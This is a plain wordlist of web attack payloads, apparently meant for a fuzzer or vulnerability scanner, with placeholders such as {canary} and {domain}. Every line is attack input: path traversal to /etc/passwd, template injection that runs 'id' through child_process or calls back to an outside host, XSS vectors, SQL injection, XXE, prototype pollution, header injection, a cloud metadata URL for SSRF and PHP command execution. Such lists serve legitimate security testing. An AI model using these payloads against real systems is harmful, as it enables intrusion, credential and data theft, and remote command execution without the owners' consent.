'
"
`
#
//
[]
{}
||
&&
^_*$
%00
%2527
%ff%fe
\u0027
&bsol;
undefined
../../../
..\..\..\
../../../../etc/passwd
..%2f..%2f..%2fetc%2fpasswd
${class.getResource("").getPath()}
__init__.__globals__["{module}"].config
${global.process.mainModule.require('child_process').execSync('id')}
${global.process.mainModule.require('http').get({host:'{domain}', port:80, path:'/callback'})}
}});console.log("{canary}");// 
constructor.constructor('alert("{canary}")')()
this.constructor.constructor("return global")().process
Object.constructor("return process")()
<script>{canary}</script>
"><img src=x onerror=alert('{canary}')>
" tabindex=1 onfocus=alert('{canary}') x="
`-alert(1)}//
'"><svg/onload=alert('{canary}')>
"><iframe src=javascript:alert('{canary}')>
<iframe/srcdoc="<script>alert('{canary}')</script>">
{{8*8}}
[[5*5]]
${7*4}
<%= 15668*2 %>
${{<%[%'"{{%\
{{ request['user'].__class__ }}
${{config.env}}
' OR 1=1-- -
SLEEP(10) /*' or SLEEP(10) or '" or SLEEP(10) or "*/
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [<!ENTITY foo "{canary}">]><root>&foo;</root>
[].__proto__.polluted = true
{"__proto__":{"admin":true}}
{"constructor":{"prototype":{"isAdmin":true}}}
","X-Injected-Header":"{canary}
%0a%0dX-Injected-Header: {canary}
%0aX-Real-IP: {domain}
http://169.254.169.254/latest/meta-data/
<?php echo `id`; ?>
